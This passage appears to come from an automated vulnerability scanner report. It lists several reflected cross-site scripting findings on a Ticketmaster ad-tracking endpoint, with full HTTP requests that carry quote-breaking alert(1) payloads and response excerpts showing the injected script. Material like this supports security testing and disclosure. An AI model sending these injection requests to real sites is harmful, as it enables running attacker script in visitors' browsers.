User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; RMFM=011QbQnIJ10I1k|U10JLQ|M10TqE; NXCLICK2=011QbQnINX_NonSecure!y!B3!gA!14lNX_TRACK_Xerox/XLS2011/ZAPTraderBluekaiBusinessDecisionMakerData_NX_NonSecure!y!B3!JLQ!Hfk; id=2814750682866683

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:42:07 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 38472
Content-Type: text/html

<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e); }

var artist1_name='
...[SNIP]...
e='';
var confcode='';
var pdate='';
var ptime='';
var pday='';
var bstate='';
var bzip='';
var country='';
var eventid='000043582C516D43';
var venueid='1233';
var artistid='13082498408b'-alert(1)-'670ae3e33cf';
var majorcatid='10001';
var minorcatid='1';

// For Purchase Tracking
var b3_d = new Image (1,1);
var b3_e = new Image (1,1);
var b3_f = new Image (1,1);
var b3_g = new Image (1,1);
var b
...[SNIP]...

4.57. http://b3.mookie1.com/2/ticketmaster/ZAP/1@x01 [_RM_HTML_bstate_ parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b3.mookie1.com
Path:	/2/ticketmaster/ZAP/1@x01

Issue detail

The value of the _RM_HTML_bstate_ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 74593'-alert(1)-'8932d5799 was submitted in the _RM_HTML_bstate_ parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /2/ticketmaster/ZAP/1@x01?&_RM_HTML_artist1_name_=u2&_RM_HTML_event_name_=U2%20360%BA%20Tour&_RM_HTML_event_date_=07%2F20%2F2011&_RM_HTML_event_time_zone_=America%2FNew_York&_RM_HTML_event_time_=07:00%20PM&_RM_HTML_event_day_=Wed&_RM_HTML_venue_name_=New%20Meadowlands%20Stadium&_RM_HTML_venuezip_=07073&_RM_HTML_tixp_=&_RM_HTML_fvalue_=&_RM_HTML_confcode_=&_RM_HTML_pdate_=&_RM_HTML_ptime_=&_RM_HTML_pday_=&_RM_HTML_bstate_=74593'-alert(1)-'8932d5799&_RM_HTML_bzip_=&_RM_HTML_country_=&_RM_HTML_eventid_=000043582C516D43&_RM_HTML_venueid_=1233&_RM_HTML_artistid_=1308249&_RM_HTML_majorcatid_=10001&_RM_HTML_minorcatid_=1&_RM_HTML_referer=http%253A%252F%252Fwww.ticketmaster.com%252Fevent%252F000043582C516D43%253Fartistid%253D736365%2526majorcatid%253D10001%2526minorcatid%253D1 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://ads.as4x.tmcs.ticketmaster.com/html.ng/site=tm&pagepos=990&adsize=1x1&brand=0&event_name='U2%20360%BA%20Tour'&venue_name='New%20Meadowlands%20Stadium'&eventid=000043582C516D43&page=event&majorcatid=10001&minorcatid=1&dmaid=324&venuezip=07073&venueid=1233&artistid=1308249&secondaryid=836507&promoter=653&pagename=edp&bgcolor=ffffff&artist1_name=u2&cceclassid=0&lang=en-us&event_date='07/20/2011'&event_time_zone='America/New_York'&event_time='07:00%20PM'&event_day='Wed'&true_ref=http%253A%252F%252Fbing.fansnap.com%252Fu2-tickets%252Fu2-with-interpol-rescheduled-from-719%252Fjuly-20-2011-389669%253Futm_source%253D1987%2526ack%253Dhttp%25253a%25252f%25252fwww.bing.com%25252fs%25252fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; RMFM=011QbQnIJ10I1k|U10JLQ|M10TqE; NXCLICK2=011QbQnINX_NonSecure!y!B3!gA!14lNX_TRACK_Xerox/XLS2011/ZAPTraderBluekaiBusinessDecisionMakerData_NX_NonSecure!y!B3!JLQ!Hfk; id=2814750682866683

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:41:46 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 38439
Content-Type: text/html

<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e); }

var artist1_name='
...[SNIP]...
event_day='Wed';
var venue_name='New%20Meadowlands%20Stadium';
var venuezip='07073';
var tixp='';
var fvalue='';
var confcode='';
var pdate='';
var ptime='';
var pday='';
var bstate='74593'-alert(1)-'8932d5799';
var bzip='';
var country='';
var eventid='000043582C516D43';
var venueid='1233';
var artistid='1308249';
var majorcatid='10001';
var minorcatid='1';

// For Purchase Tracking
var b3
...[SNIP]...

4.58. http://b3.mookie1.com/2/ticketmaster/ZAP/1@x01 [_RM_HTML_bzip_ parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b3.mookie1.com
Path:	/2/ticketmaster/ZAP/1@x01

Issue detail

The value of the _RM_HTML_bzip_ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 35295'-alert(1)-'a3368e69539 was submitted in the _RM_HTML_bzip_ parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /2/ticketmaster/ZAP/1@x01?&_RM_HTML_artist1_name_=u2&_RM_HTML_event_name_=U2%20360%BA%20Tour&_RM_HTML_event_date_=07%2F20%2F2011&_RM_HTML_event_time_zone_=America%2FNew_York&_RM_HTML_event_time_=07:00%20PM&_RM_HTML_event_day_=Wed&_RM_HTML_venue_name_=New%20Meadowlands%20Stadium&_RM_HTML_venuezip_=07073&_RM_HTML_tixp_=&_RM_HTML_fvalue_=&_RM_HTML_confcode_=&_RM_HTML_pdate_=&_RM_HTML_ptime_=&_RM_HTML_pday_=&_RM_HTML_bstate_=&_RM_HTML_bzip_=35295'-alert(1)-'a3368e69539&_RM_HTML_country_=&_RM_HTML_eventid_=000043582C516D43&_RM_HTML_venueid_=1233&_RM_HTML_artistid_=1308249&_RM_HTML_majorcatid_=10001&_RM_HTML_minorcatid_=1&_RM_HTML_referer=http%253A%252F%252Fwww.ticketmaster.com%252Fevent%252F000043582C516D43%253Fartistid%253D736365%2526majorcatid%253D10001%2526minorcatid%253D1 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://ads.as4x.tmcs.ticketmaster.com/html.ng/site=tm&pagepos=990&adsize=1x1&brand=0&event_name='U2%20360%BA%20Tour'&venue_name='New%20Meadowlands%20Stadium'&eventid=000043582C516D43&page=event&majorcatid=10001&minorcatid=1&dmaid=324&venuezip=07073&venueid=1233&artistid=1308249&secondaryid=836507&promoter=653&pagename=edp&bgcolor=ffffff&artist1_name=u2&cceclassid=0&lang=en-us&event_date='07/20/2011'&event_time_zone='America/New_York'&event_time='07:00%20PM'&event_day='Wed'&true_ref=http%253A%252F%252Fbing.fansnap.com%252Fu2-tickets%252Fu2-with-interpol-rescheduled-from-719%252Fjuly-20-2011-389669%253Futm_source%253D1987%2526ack%253Dhttp%25253a%25252f%25252fwww.bing.com%25252fs%25252fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; RMFM=011QbQnIJ10I1k|U10JLQ|M10TqE; NXCLICK2=011QbQnINX_NonSecure!y!B3!gA!14lNX_TRACK_Xerox/XLS2011/ZAPTraderBluekaiBusinessDecisionMakerData_NX_NonSecure!y!B3!JLQ!Hfk; id=2814750682866683

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:41:50 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 38472
Content-Type: text/html

<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e); }

var artist1_name='
...[SNIP]...
;
var venue_name='New%20Meadowlands%20Stadium';
var venuezip='07073';
var tixp='';
var fvalue='';
var confcode='';
var pdate='';
var ptime='';
var pday='';
var bstate='';
var bzip='35295'-alert(1)-'a3368e69539';
var country='';
var eventid='000043582C516D43';
var venueid='1233';
var artistid='1308249';
var majorcatid='10001';
var minorcatid='1';

// For Purchase Tracking
var b3_d = new Image
...[SNIP]...

4.59. http://b3.mookie1.com/2/ticketmaster/ZAP/1@x01 [_RM_HTML_confcode_ parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b3.mookie1.com
Path:	/2/ticketmaster/ZAP/1@x01

Issue detail

The value of the _RM_HTML_confcode_ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7a9a8'-alert(1)-'30c8d0703c7 was submitted in the _RM_HTML_confcode_ parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /2/ticketmaster/ZAP/1@x01?&_RM_HTML_artist1_name_=u2&_RM_HTML_event_name_=U2%20360%BA%20Tour&_RM_HTML_event_date_=07%2F20%2F2011&_RM_HTML_event_time_zone_=America%2FNew_York&_RM_HTML_event_time_=07:00%20PM&_RM_HTML_event_day_=Wed&_RM_HTML_venue_name_=New%20Meadowlands%20Stadium&_RM_HTML_venuezip_=07073&_RM_HTML_tixp_=&_RM_HTML_fvalue_=&_RM_HTML_confcode_=7a9a8'-alert(1)-'30c8d0703c7&_RM_HTML_pdate_=&_RM_HTML_ptime_=&_RM_HTML_pday_=&_RM_HTML_bstate_=&_RM_HTML_bzip_=&_RM_HTML_country_=&_RM_HTML_eventid_=000043582C516D43&_RM_HTML_venueid_=1233&_RM_HTML_artistid_=1308249&_RM_HTML_majorcatid_=10001&_RM_HTML_minorcatid_=1&_RM_HTML_referer=http%253A%252F%252Fwww.ticketmaster.com%252Fevent%252F000043582C516D43%253Fartistid%253D736365%2526majorcatid%253D10001%2526minorcatid%253D1 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://ads.as4x.tmcs.ticketmaster.com/html.ng/site=tm&pagepos=990&adsize=1x1&brand=0&event_name='U2%20360%BA%20Tour'&venue_name='New%20Meadowlands%20Stadium'&eventid=000043582C516D43&page=event&majorcatid=10001&minorcatid=1&dmaid=324&venuezip=07073&venueid=1233&artistid=1308249&secondaryid=836507&promoter=653&pagename=edp&bgcolor=ffffff&artist1_name=u2&cceclassid=0&lang=en-us&event_date='07/20/2011'&event_time_zone='America/New_York'&event_time='07:00%20PM'&event_day='Wed'&true_ref=http%253A%252F%252Fbing.fansnap.com%252Fu2-tickets%252Fu2-with-interpol-rescheduled-from-719%252Fjuly-20-2011-389669%253Futm_source%253D1987%2526ack%253Dhttp%25253a%25252f%25252fwww.bing.com%25252fs%25252fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; RMFM=011QbQnIJ10I1k|U10JLQ|M10TqE; NXCLICK2=011QbQnINX_NonSecure!y!B3!gA!14lNX_TRACK_Xerox/XLS2011/ZAPTraderBluekaiBusinessDecisionMakerData_NX_NonSecure!y!B3!JLQ!Hfk; id=2814750682866683

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:41:29 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 38472
Content-Type: text/html

<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e); }

var artist1_name='
...[SNIP]...
e_zone='America/New_York';
var event_time='07:00%20PM';
var event_day='Wed';
var venue_name='New%20Meadowlands%20Stadium';
var venuezip='07073';
var tixp='';
var fvalue='';
var confcode='7a9a8'-alert(1)-'30c8d0703c7';
var pdate='';
var ptime='';
var pday='';
var bstate='';
var bzip='';
var country='';
var eventid='000043582C516D43';
var venueid='1233';
var artistid='1308249';
var majorcatid='1
...[SNIP]...

4.60. http://b3.mookie1.com/2/ticketmaster/ZAP/1@x01 [_RM_HTML_country_ parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b3.mookie1.com
Path:	/2/ticketmaster/ZAP/1@x01

Issue detail

The value of the _RM_HTML_country_ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7d062'-alert(1)-'cd41cc7dc96 was submitted in the _RM_HTML_country_ parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /2/ticketmaster/ZAP/1@x01?&_RM_HTML_artist1_name_=u2&_RM_HTML_event_name_=U2%20360%BA%20Tour&_RM_HTML_event_date_=07%2F20%2F2011&_RM_HTML_event_time_zone_=America%2FNew_York&_RM_HTML_event_time_=07:00%20PM&_RM_HTML_event_day_=Wed&_RM_HTML_venue_name_=New%20Meadowlands%20Stadium&_RM_HTML_venuezip_=07073&_RM_HTML_tixp_=&_RM_HTML_fvalue_=&_RM_HTML_confcode_=&_RM_HTML_pdate_=&_RM_HTML_ptime_=&_RM_HTML_pday_=&_RM_HTML_bstate_=&_RM_HTML_bzip_=&_RM_HTML_country_=7d062'-alert(1)-'cd41cc7dc96&_RM_HTML_eventid_=000043582C516D43&_RM_HTML_venueid_=1233&_RM_HTML_artistid_=1308249&_RM_HTML_majorcatid_=10001&_RM_HTML_minorcatid_=1&_RM_HTML_referer=http%253A%252F%252Fwww.ticketmaster.com%252Fevent%252F000043582C516D43%253Fartistid%253D736365%2526majorcatid%253D10001%2526minorcatid%253D1 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://ads.as4x.tmcs.ticketmaster.com/html.ng/site=tm&pagepos=990&adsize=1x1&brand=0&event_name='U2%20360%BA%20Tour'&venue_name='New%20Meadowlands%20Stadium'&eventid=000043582C516D43&page=event&majorcatid=10001&minorcatid=1&dmaid=324&venuezip=07073&venueid=1233&artistid=1308249&secondaryid=836507&promoter=653&pagename=edp&bgcolor=ffffff&artist1_name=u2&cceclassid=0&lang=en-us&event_date='07/20/2011'&event_time_zone='America/New_York'&event_time='07:00%20PM'&event_day='Wed'&true_ref=http%253A%252F%252Fbing.fansnap.com%252Fu2-tickets%252Fu2-with-interpol-rescheduled-from-719%252Fjuly-20-2011-389669%253Futm_source%253D1987%2526ack%253Dhttp%25253a%25252f%25252fwww.bing.com%25252fs%25252fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; RMFM=011QbQnIJ10I1k|U10JLQ|M10TqE; NXCLICK2=011QbQnINX_NonSecure!y!B3!gA!14lNX_TRACK_Xerox/XLS2011/ZAPTraderBluekaiBusinessDecisionMakerData_NX_NonSecure!y!B3!JLQ!Hfk; id=2814750682866683

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:41:55 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 38410
Content-Type: text/html

<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e); }

var artist1_name='
...[SNIP]...
='New%20Meadowlands%20Stadium';
var venuezip='07073';
var tixp='';
var fvalue='';
var confcode='';
var pdate='';
var ptime='';
var pday='';
var bstate='';
var bzip='';
var country='7d062'-alert(1)-'cd41cc7dc96';
var eventid='000043582C516D43';
var venueid='1233';
var artistid='1308249';
var majorcatid='10001';
var minorcatid='1';

// For Purchase Tracking
var b3_d = new Image (1,1);
var b3_e =
...[SNIP]...

4.61. http://b3.mookie1.com/2/ticketmaster/ZAP/1@x01 [_RM_HTML_event_date_ parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b3.mookie1.com
Path:	/2/ticketmaster/ZAP/1@x01

Issue detail

The value of the _RM_HTML_event_date_ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9fd05'-alert(1)-'d3d6bae4899 was submitted in the _RM_HTML_event_date_ parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /2/ticketmaster/ZAP/1@x01?&_RM_HTML_artist1_name_=u2&_RM_HTML_event_name_=U2%20360%BA%20Tour&_RM_HTML_event_date_=07%2F20%2F20119fd05'-alert(1)-'d3d6bae4899&_RM_HTML_event_time_zone_=America%2FNew_York&_RM_HTML_event_time_=07:00%20PM&_RM_HTML_event_day_=Wed&_RM_HTML_venue_name_=New%20Meadowlands%20Stadium&_RM_HTML_venuezip_=07073&_RM_HTML_tixp_=&_RM_HTML_fvalue_=&_RM_HTML_confcode_=&_RM_HTML_pdate_=&_RM_HTML_ptime_=&_RM_HTML_pday_=&_RM_HTML_bstate_=&_RM_HTML_bzip_=&_RM_HTML_country_=&_RM_HTML_eventid_=000043582C516D43&_RM_HTML_venueid_=1233&_RM_HTML_artistid_=1308249&_RM_HTML_majorcatid_=10001&_RM_HTML_minorcatid_=1&_RM_HTML_referer=http%253A%252F%252Fwww.ticketmaster.com%252Fevent%252F000043582C516D43%253Fartistid%253D736365%2526majorcatid%253D10001%2526minorcatid%253D1 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://ads.as4x.tmcs.ticketmaster.com/html.ng/site=tm&pagepos=990&adsize=1x1&brand=0&event_name='U2%20360%BA%20Tour'&venue_name='New%20Meadowlands%20Stadium'&eventid=000043582C516D43&page=event&majorcatid=10001&minorcatid=1&dmaid=324&venuezip=07073&venueid=1233&artistid=1308249&secondaryid=836507&promoter=653&pagename=edp&bgcolor=ffffff&artist1_name=u2&cceclassid=0&lang=en-us&event_date='07/20/2011'&event_time_zone='America/New_York'&event_time='07:00%20PM'&event_day='Wed'&true_ref=http%253A%252F%252Fbing.fansnap.com%252Fu2-tickets%252Fu2-with-interpol-rescheduled-from-719%252Fjuly-20-2011-389669%253Futm_source%253D1987%2526ack%253Dhttp%25253a%25252f%25252fwww.bing.com%25252fs%25252fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; RMFM=011QbQnIJ10I1k|U10JLQ|M10TqE; NXCLICK2=011QbQnINX_NonSecure!y!B3!gA!14lNX_TRACK_Xerox/XLS2011/ZAPTraderBluekaiBusinessDecisionMakerData_NX_NonSecure!y!B3!JLQ!Hfk; id=2814750682866683

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:40:56 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 38441
Content-Type: text/html

<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e); }

var artist1_name='u2';
var event_name='U2%20360%BA%20Tour';
var event_date='07/20/20119fd05'-alert(1)-'d3d6bae4899';
var event_time_zone='America/New_York';
var event_time='07:00%20PM';
var event_day='Wed';
var venue_name='New%20Meadowlands%20Stadium';
var venuezip='07073';
var tixp='';
var fvalue=''
...[SNIP]...

4.62. http://b3.mookie1.com/2/ticketmaster/ZAP/1@x01 [_RM_HTML_event_day_ parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b3.mookie1.com
Path:	/2/ticketmaster/ZAP/1@x01

Issue detail

The value of the _RM_HTML_event_day_ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5a194'-alert(1)-'7572b7944d9 was submitted in the _RM_HTML_event_day_ parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /2/ticketmaster/ZAP/1@x01?&_RM_HTML_artist1_name_=u2&_RM_HTML_event_name_=U2%20360%BA%20Tour&_RM_HTML_event_date_=07%2F20%2F2011&_RM_HTML_event_time_zone_=America%2FNew_York&_RM_HTML_event_time_=07:00%20PM&_RM_HTML_event_day_=Wed5a194'-alert(1)-'7572b7944d9&_RM_HTML_venue_name_=New%20Meadowlands%20Stadium&_RM_HTML_venuezip_=07073&_RM_HTML_tixp_=&_RM_HTML_fvalue_=&_RM_HTML_confcode_=&_RM_HTML_pdate_=&_RM_HTML_ptime_=&_RM_HTML_pday_=&_RM_HTML_bstate_=&_RM_HTML_bzip_=&_RM_HTML_country_=&_RM_HTML_eventid_=000043582C516D43&_RM_HTML_venueid_=1233&_RM_HTML_artistid_=1308249&_RM_HTML_majorcatid_=10001&_RM_HTML_minorcatid_=1&_RM_HTML_referer=http%253A%252F%252Fwww.ticketmaster.com%252Fevent%252F000043582C516D43%253Fartistid%253D736365%2526majorcatid%253D10001%2526minorcatid%253D1 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://ads.as4x.tmcs.ticketmaster.com/html.ng/site=tm&pagepos=990&adsize=1x1&brand=0&event_name='U2%20360%BA%20Tour'&venue_name='New%20Meadowlands%20Stadium'&eventid=000043582C516D43&page=event&majorcatid=10001&minorcatid=1&dmaid=324&venuezip=07073&venueid=1233&artistid=1308249&secondaryid=836507&promoter=653&pagename=edp&bgcolor=ffffff&artist1_name=u2&cceclassid=0&lang=en-us&event_date='07/20/2011'&event_time_zone='America/New_York'&event_time='07:00%20PM'&event_day='Wed'&true_ref=http%253A%252F%252Fbing.fansnap.com%252Fu2-tickets%252Fu2-with-interpol-rescheduled-from-719%252Fjuly-20-2011-389669%253Futm_source%253D1987%2526ack%253Dhttp%25253a%25252f%25252fwww.bing.com%25252fs%25252fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; RMFM=011QbQnIJ10I1k|U10JLQ|M10TqE; NXCLICK2=011QbQnINX_NonSecure!y!B3!gA!14lNX_TRACK_Xerox/XLS2011/ZAPTraderBluekaiBusinessDecisionMakerData_NX_NonSecure!y!B3!JLQ!Hfk; id=2814750682866683

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:41:09 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 38472
Content-Type: text/html

<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e); }

var artist1_name='u2';
var event_name='U2%20360%BA%20Tour';
var event_date='07/20/2011';
var event_time_zone='America/New_York';
var event_time='07:00%20PM';
var event_day='Wed5a194'-alert(1)-'7572b7944d9';
var venue_name='New%20Meadowlands%20Stadium';
var venuezip='07073';
var tixp='';
var fvalue='';
var confcode='';
var pdate='';
var ptime='';
var pday='';
var bstate='';
var bzip=
...[SNIP]...

4.63. http://b3.mookie1.com/2/ticketmaster/ZAP/1@x01 [_RM_HTML_event_name_ parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b3.mookie1.com
Path:	/2/ticketmaster/ZAP/1@x01

Issue detail

The value of the _RM_HTML_event_name_ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 540a3'-alert(1)-'11fecdb1994 was submitted in the _RM_HTML_event_name_ parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /2/ticketmaster/ZAP/1@x01?&_RM_HTML_artist1_name_=u2&_RM_HTML_event_name_=U2%20360%BA%20Tour540a3'-alert(1)-'11fecdb1994&_RM_HTML_event_date_=07%2F20%2F2011&_RM_HTML_event_time_zone_=America%2FNew_York&_RM_HTML_event_time_=07:00%20PM&_RM_HTML_event_day_=Wed&_RM_HTML_venue_name_=New%20Meadowlands%20Stadium&_RM_HTML_venuezip_=07073&_RM_HTML_tixp_=&_RM_HTML_fvalue_=&_RM_HTML_confcode_=&_RM_HTML_pdate_=&_RM_HTML_ptime_=&_RM_HTML_pday_=&_RM_HTML_bstate_=&_RM_HTML_bzip_=&_RM_HTML_country_=&_RM_HTML_eventid_=000043582C516D43&_RM_HTML_venueid_=1233&_RM_HTML_artistid_=1308249&_RM_HTML_majorcatid_=10001&_RM_HTML_minorcatid_=1&_RM_HTML_referer=http%253A%252F%252Fwww.ticketmaster.com%252Fevent%252F000043582C516D43%253Fartistid%253D736365%2526majorcatid%253D10001%2526minorcatid%253D1 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://ads.as4x.tmcs.ticketmaster.com/html.ng/site=tm&pagepos=990&adsize=1x1&brand=0&event_name='U2%20360%BA%20Tour'&venue_name='New%20Meadowlands%20Stadium'&eventid=000043582C516D43&page=event&majorcatid=10001&minorcatid=1&dmaid=324&venuezip=07073&venueid=1233&artistid=1308249&secondaryid=836507&promoter=653&pagename=edp&bgcolor=ffffff&artist1_name=u2&cceclassid=0&lang=en-us&event_date='07/20/2011'&event_time_zone='America/New_York'&event_time='07:00%20PM'&event_day='Wed'&true_ref=http%253A%252F%252Fbing.fansnap.com%252Fu2-tickets%252Fu2-with-interpol-rescheduled-from-719%252Fjuly-20-2011-389669%253Futm_source%253D1987%2526ack%253Dhttp%25253a%25252f%25252fwww.bing.com%25252fs%25252fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; RMFM=011QbQnIJ10I1k|U10JLQ|M10TqE; NXCLICK2=011QbQnINX_NonSecure!y!B3!gA!14lNX_TRACK_Xerox/XLS2011/ZAPTraderBluekaiBusinessDecisionMakerData_NX_NonSecure!y!B3!JLQ!Hfk; id=2814750682866683

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:40:52 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 38441
Content-Type: text/html

<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e); }

var artist1_name='u2';
var event_name='U2%20360%BA%20Tour540a3'-alert(1)-'11fecdb1994';
